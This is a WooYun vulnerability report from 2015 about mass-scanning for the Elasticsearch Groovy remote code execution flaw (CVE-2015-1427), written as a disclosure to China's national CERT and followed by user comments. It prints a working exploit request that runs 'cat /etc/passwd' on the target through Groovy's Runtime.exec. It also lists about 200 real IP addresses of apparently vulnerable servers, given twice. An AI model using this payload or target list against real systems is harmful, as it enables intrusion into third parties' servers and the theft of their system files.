当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101429

漏洞标题:看我是如何在2小时内组建3000+集群服务器僵尸网络的

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-03-15 09:56

修复时间:2015-04-29 09:58

公开时间:2015-04-29 09:58

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-15: 细节已通知厂商并且等待厂商处理中
2015-03-18: 厂商已经确认,细节仅向厂商公开
2015-03-28: 细节向核心白帽子及相关领域专家公开
2015-04-07: 细节向普通白帽子公开
2015-04-17: 细节向实习白帽子公开
2015-04-29: 细节向公众公开

简要描述:

3000+集群服务器执行任意命令

详细说明:

看了 WooYun: 我是如何在2小时内组建"5000+集群服务器僵尸网络"的 ,决定针对(CVE-2015-1427)Elasticsearch Groovy 脚本动态执行漏洞对全网进行自动化扫描。
全网共检查存在漏洞网站3000+(去重复后)。
国内发现存在漏洞IP 197个
EXP 如下:

POST IP:9200/_search?pretty
{"size":1,"script_fields": {"test#": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}


国内受影响IP:

http://114.80.156.167
http://202.105.7.173
http://112.126.64.18
http://121.40.62.116
http://203.195.197.22
http://182.92.220.150
http://115.28.181.216
http://182.92.0.244
http://121.199.1.80
http://121.41.72.14
http://121.41.53.71
http://115.28.191.16
http://116.55.245.125
http://114.215.205.185
http://112.124.6.56
http://120.24.225.118
http://115.29.227.90
http://61.154.116.182
http://115.29.246.247
http://112.126.73.73
http://115.236.59.194
http://103.31.203.246
http://203.195.151.221
http://115.29.250.200
http://121.40.106.146
http://203.195.194.168
http://112.124.59.36
http://115.29.235.200
http://221.234.42.157
http://121.41.75.56
http://121.41.117.85
http://114.215.178.149
http://114.215.182.17
http://211.151.7.138
http://115.28.149.20
http://121.41.53.252
http://121.199.29.244
http://210.34.4.74
http://42.62.105.193
http://58.215.139.37
http://203.80.144.147
http://182.92.183.155
http://115.29.232.33
http://121.42.44.81
http://182.92.185.67
http://221.122.117.100
http://222.46.26.181
http://121.42.43.41
http://115.29.4.204
http://118.192.85.69
http://183.131.78.117
http://112.124.127.92
http://114.119.5.13
http://211.149.162.148
http://120.27.50.144
http://202.38.82.13
http://112.124.32.45
http://121.40.207.8
http://203.195.212.109
http://219.223.190.240
http://42.121.0.1
http://119.254.111.115
http://118.126.11.236
http://117.135.160.33
http://114.119.5.11
http://219.223.190.244
http://115.28.42.79
http://222.128.5.168
http://112.126.73.126
http://121.42.54.213
http://121.199.13.100
http://119.29.21.23
http://115.159.25.211
http://121.201.107.31
http://115.29.228.42
http://122.144.133.98
http://111.1.36.241
http://175.102.35.207
http://115.29.244.108
http://61.174.8.250
http://180.150.165.236
http://121.40.186.130
http://183.136.214.115
http://101.69.176.166
http://115.159.27.203
http://60.194.60.122
http://121.199.46.98
http://114.112.84.245
http://121.42.44.105
http://59.175.153.121
http://115.28.216.245
http://59.175.153.37
http://59.50.115.187
http://112.124.122.191
http://112.124.109.98
http://120.27.29.171
http://123.57.135.102
http://121.42.54.231
http://60.173.26.169
http://120.24.53.40
http://121.40.72.69
http://121.199.43.101
http://211.147.220.169
http://120.27.46.165
http://121.40.123.81
http://219.239.238.131
http://120.24.65.119
http://61.175.96.35
http://218.25.139.156
http://121.40.85.12
http://121.41.24.243
http://183.63.24.133
http://42.62.40.183
http://114.215.107.77
http://115.29.237.149
http://121.197.1.219
http://123.57.64.70
http://114.80.210.48
http://119.29.38.185
http://106.39.63.119
http://182.254.202.95
http://114.215.204.97
http://121.42.15.119
http://182.254.201.126
http://182.92.100.197
http://123.162.189.105
http://60.12.69.245
http://121.40.139.76
http://115.29.145.89
http://59.175.153.122
http://182.92.189.194
http://218.244.150.169
http://202.136.62.243
http://121.42.41.74
http://123.57.83.185
http://182.18.47.199
http://211.157.188.219
http://123.57.9.138
http://115.28.9.13
http://115.29.9.119
http://121.41.48.196
http://120.92.244.150
http://121.41.114.133
http://121.41.117.106
http://121.40.104.63
http://115.28.181.92
http://121.42.41.91
http://120.24.81.56
http://58.68.250.156
http://119.90.0.154
http://58.210.46.6
http://221.122.121.97
http://219.232.240.226
http://202.104.70.251
http://42.62.15.183
http://115.29.174.74
http://42.62.73.186
http://120.27.44.63
http://182.92.218.156
http://117.121.31.140
http://120.132.57.81
http://115.238.164.185
http://115.29.76.225
http://121.42.40.149
http://121.41.55.16
http://59.42.210.213
http://120.132.66.197
http://112.124.11.22
http://115.28.220.66
http://203.195.234.184
http://120.132.56.152
http://58.23.5.117
http://58.23.5.118
http://54.223.161.189
http://123.57.42.74
http://115.29.163.225
http://218.244.143.196
http://203.195.148.250
http://183.131.78.93
http://222.87.144.140
http://121.40.53.9
http://121.42.148.190
http://182.254.165.146
http://115.29.227.90 
http://211.151.7.139 
http://218.244.143.196 
http://182.92.159.210 
http://125.77.199.221
http://61.174.9.217
http://58.61.38.143
http://121.41.52.69
http://115.28.157.134
http://182.92.238.251
http://203.195.151.221 
http://123.57.5.118
http://182.92.216.104
http://54.223.160.171
http://124.193.144.140


既然可以自动化验测,当然可以自动化攻击。还请相关单位进行排查

漏洞证明:

国内受影响IP:

http://114.80.156.167
http://202.105.7.173
http://112.126.64.18
http://121.40.62.116
http://203.195.197.22
http://182.92.220.150
http://115.28.181.216
http://182.92.0.244
http://121.199.1.80
http://121.41.72.14
http://121.41.53.71
http://115.28.191.16
http://116.55.245.125
http://114.215.205.185
http://112.124.6.56
http://120.24.225.118
http://115.29.227.90
http://61.154.116.182
http://115.29.246.247
http://112.126.73.73
http://115.236.59.194
http://103.31.203.246
http://203.195.151.221
http://115.29.250.200
http://121.40.106.146
http://203.195.194.168
http://112.124.59.36
http://115.29.235.200
http://221.234.42.157
http://121.41.75.56
http://121.41.117.85
http://114.215.178.149
http://114.215.182.17
http://211.151.7.138
http://115.28.149.20
http://121.41.53.252
http://121.199.29.244
http://210.34.4.74
http://42.62.105.193
http://58.215.139.37
http://203.80.144.147
http://182.92.183.155
http://115.29.232.33
http://121.42.44.81
http://182.92.185.67
http://221.122.117.100
http://222.46.26.181
http://121.42.43.41
http://115.29.4.204
http://118.192.85.69
http://183.131.78.117
http://112.124.127.92
http://114.119.5.13
http://211.149.162.148
http://120.27.50.144
http://202.38.82.13
http://112.124.32.45
http://121.40.207.8
http://203.195.212.109
http://219.223.190.240
http://42.121.0.1
http://119.254.111.115
http://118.126.11.236
http://117.135.160.33
http://114.119.5.11
http://219.223.190.244
http://115.28.42.79
http://222.128.5.168
http://112.126.73.126
http://121.42.54.213
http://121.199.13.100
http://119.29.21.23
http://115.159.25.211
http://121.201.107.31
http://115.29.228.42
http://122.144.133.98
http://111.1.36.241
http://175.102.35.207
http://115.29.244.108
http://61.174.8.250
http://180.150.165.236
http://121.40.186.130
http://183.136.214.115
http://101.69.176.166
http://115.159.27.203
http://60.194.60.122
http://121.199.46.98
http://114.112.84.245
http://121.42.44.105
http://59.175.153.121
http://115.28.216.245
http://59.175.153.37
http://59.50.115.187
http://112.124.122.191
http://112.124.109.98
http://120.27.29.171
http://123.57.135.102
http://121.42.54.231
http://60.173.26.169
http://120.24.53.40
http://121.40.72.69
http://121.199.43.101
http://211.147.220.169
http://120.27.46.165
http://121.40.123.81
http://219.239.238.131
http://120.24.65.119
http://61.175.96.35
http://218.25.139.156
http://121.40.85.12
http://121.41.24.243
http://183.63.24.133
http://42.62.40.183
http://114.215.107.77
http://115.29.237.149
http://121.197.1.219
http://123.57.64.70
http://114.80.210.48
http://119.29.38.185
http://106.39.63.119
http://182.254.202.95
http://114.215.204.97
http://121.42.15.119
http://182.254.201.126
http://182.92.100.197
http://123.162.189.105
http://60.12.69.245
http://121.40.139.76
http://115.29.145.89
http://59.175.153.122
http://182.92.189.194
http://218.244.150.169
http://202.136.62.243
http://121.42.41.74
http://123.57.83.185
http://182.18.47.199
http://211.157.188.219
http://123.57.9.138
http://115.28.9.13
http://115.29.9.119
http://121.41.48.196
http://120.92.244.150
http://121.41.114.133
http://121.41.117.106
http://121.40.104.63
http://115.28.181.92
http://121.42.41.91
http://120.24.81.56
http://58.68.250.156
http://119.90.0.154
http://58.210.46.6
http://221.122.121.97
http://219.232.240.226
http://202.104.70.251
http://42.62.15.183
http://115.29.174.74
http://42.62.73.186
http://120.27.44.63
http://182.92.218.156
http://117.121.31.140
http://120.132.57.81
http://115.238.164.185
http://115.29.76.225
http://121.42.40.149
http://121.41.55.16
http://59.42.210.213
http://120.132.66.197
http://112.124.11.22
http://115.28.220.66
http://203.195.234.184
http://120.132.56.152
http://58.23.5.117
http://58.23.5.118
http://54.223.161.189
http://123.57.42.74
http://115.29.163.225
http://218.244.143.196
http://203.195.148.250
http://183.131.78.93
http://222.87.144.140
http://121.40.53.9
http://121.42.148.190
http://182.254.165.146
http://115.29.227.90 
http://211.151.7.139 
http://218.244.143.196 
http://182.92.159.210 
http://125.77.199.221
http://61.174.9.217
http://58.61.38.143
http://121.41.52.69
http://115.28.157.134
http://182.92.238.251
http://203.195.151.221 
http://123.57.5.118
http://182.92.216.104
http://54.223.160.171
http://124.193.144.140

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-18 14:22

厂商回复:

已经根据所述结果对重要用户IP进行比对,分别发给对应的用户进行处置。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-03-15 09:59 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    我来占个前排

  2. 2015-03-15 10:17 | sky ( 实习白帽子 | Rank:94 漏洞数:33 | 有一天,我带着儿子@jeary 去@园长 的园长...)

    。。貌似很吊?蝴蝶效应?

  3. 2015-03-15 10:49 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:142 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    又来?没完了。。。

  4. 2015-03-15 11:43 | f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)

    又是批量刷elasticsearch?

  5. 2015-03-15 17:10 | 大大灰狼 ( 普通白帽子 | Rank:248 漏洞数:53 | Newbie)

    又来?没完了。。。

  6. 2015-03-18 15:07 | zhxs ( 实习白帽子 | Rank:32 漏洞数:19 | Jyhack-TeaM:http://bbs.jyhack.com/)

    多叼?能打瘫白宫不

  7. 2015-03-20 13:36 | me1ody ( 路人 | Rank:26 漏洞数:15 | 乌云临时工)

    前排

  8. 2015-04-29 10:02 | greg.wu ( 普通白帽子 | Rank:815 漏洞数:99 | 打酱油的~)

    论如何做个标题党

  9. 2015-04-29 10:10 | 追梦人丶 ( 路人 | Rank:4 漏洞数:2 | 梦想家!)

    论如何做个标题党

  10. 2015-04-29 10:53 | 我是壮丁 认证白帽子 ( 路人 | Rank:10 漏洞数:1 | 专业打酱油)

    论如何做个标题党

  11. 2015-04-29 12:03 | 一根寒毛 ( 路人 | Rank:17 漏洞数:2 | 野火烧不尽,春风吹又生!)

    指哪打哪...

  12. 2015-04-29 12:53 | 酷帥王子 ( 普通白帽子 | Rank:111 漏洞数:34 | 天朗日清,和风送闲,可叹那俊逸如我顾影自...)

    批处理挖洞好TMD的牛逼啊

  13. 2015-04-30 10:09 | xxyyzz ( 实习白帽子 | Rank:57 漏洞数:6 | 123456)

    论如何做个标题党